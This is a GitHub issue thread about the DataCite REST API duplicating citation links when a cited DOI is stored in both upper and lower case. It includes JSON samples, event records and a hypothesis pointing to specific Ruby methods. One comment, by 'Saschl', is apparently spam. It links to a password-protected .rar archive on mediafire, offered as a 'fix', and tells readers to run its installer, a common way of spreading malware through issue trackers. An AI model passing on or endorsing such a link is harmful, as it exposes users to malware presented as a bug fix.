### ISSUE TITLE
Citations/references/other DOI connections may be duplicated in REST API within a single DOI record 

### ISSUE THREAD

**Issue by codycooperross** [datacite/datacite#2195]
### Describe the bug

Citations/references/other DOI connections may be duplicated in REST API within a single DOI record like so:

```
"citationCount": 2,
"citations": {
"data": [
{
"id": "10.32725/jab.2020.004",
"type": "dois"
},
{
"id": "10.32725/jab.2020.004",
"type": "dois"
}
]
},
```

#### Expected Behaviour

Citations/references/other DOI connections to a single PID should only appear once. 

#### Current Behaviour

Citations/references/other DOI connections to a single PID may appear more than once. 

#### Steps to Reproduce

1. See https://api.datacite.org/dois/10.17632/579pxjyjz8.1 

#### Hypothesis

For `10.17632/579pxjyjz8.1`, the event records contain capitalized and lowercase citation events for a single DOI, `10.32725/jab.2020.004`, i.e. `10.32725/jab.2020.004` and `10.32725/JAB.2020.004`. Consequently, in this method in the Doi model:

https://github.com/datacite/lupo/blob/028cdf3304a4a9e6b4a2626b0d0b5ecff28c4256/app/models/doi.rb#L1287-L1289

... the record is counted twice and then down-cased. The down-case should happen first. 

This impacts other methods like `citation_count` and other connection methods:

https://github.com/datacite/lupo/blob/028cdf3304a4a9e6b4a2626b0d0b5ecff28c4256/app/models/doi.rb#L1292-L1294

**Comment by Saschl** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by codycooperross** [comment]
There are two citation events `10.17632/579pxjyjz8.1` containing the following:

```
  source_doi: "10.32725/JAB.2020.004",
  target_doi: "10.17632/579PXJYJZ8.1",
  source_relation_type_id: "references",
  target_relation_type_id: "citations"
```

```
  source_doi: "10.32725/jab.2020.004",
  target_doi: "10.17632/579pxjyjz8.1",
  source_relation_type_id: "references",
  target_relation_type_id: "citations"
```

The case difference is likely to have caused the duplication.
